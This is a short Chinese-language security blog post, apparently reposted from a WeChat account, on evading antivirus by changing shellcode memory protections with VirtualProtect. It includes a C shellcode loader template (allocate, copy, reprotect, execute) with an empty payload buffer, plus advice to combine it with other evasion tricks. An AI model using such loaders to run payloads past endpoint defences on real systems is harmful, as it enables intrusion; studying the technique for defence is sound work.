免杀 修改shellcode内存堆的属性

免责声明

      文章所涉及内容，仅供安全研究教学使用，由于传播、利用本文所提供的信息而造成的任何直接或间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任

前言

众所周知：AV/EDR喜欢扫描具有RWX属性的内存区域，所以我们使用RW-RX

所使用到的函数：VirtualProtect：

BOOL VirtualProtect(

  [in]  LPVOID lpAddress,

  [in]  SIZE_T dwSize,

  [in]  DWORD  flNewProtect,

  [out] PDWORD lpflOldProtect

);

上面是函数所使用到的的参数。

lpAddress：指向要变更保护属性的地址起始位置

dwSize：要更改其访问保护属性的区域的大小

flNewProtect：更改的内存属性

lpflOldProtect：内存原始属性保存地

#include <Windows.h> int main() {     int shellcode_size = 0;     BOOL pt;     DWORD oldProtect;     unsigned char buf[] = {  };     shellcode_size = sizeof(buf);     LPVOID shellcode;     shellcode = VirtualAlloc(NULL, shellcode_size, MEM_COMMIT, 0x04);     CopyMemory(shellcode, buf, shellcode_size);     pt = VirtualProtect(shellcode, shellcode_size, 0x40, &oldProtect);//这里我们最好把权限修改为40，使用20会报c05     ((void(*)())shellcode)();     //pt = VirtualProtect(buf, shellcode_size, 0x40, &oldProtect);    //((void(*)())&buf)(); }

通过此代码的思路，我们可以想到是否可以将内存属性修改以后将shellcode复制进去，以达到欺骗杀软的作用。

当然我们直接使用他来免杀是不行的，这里我们可以有一个这种思路去配合其他方法来达到免杀的需求，更多时候我们需要灵活的思维，去应对不同的实际环境，实战环境很多时候我们无法预测，灵活变通才有好多的效果。

原文始发于微信公众号（泾弦安全）：免杀 修改shellcode内存堆的属性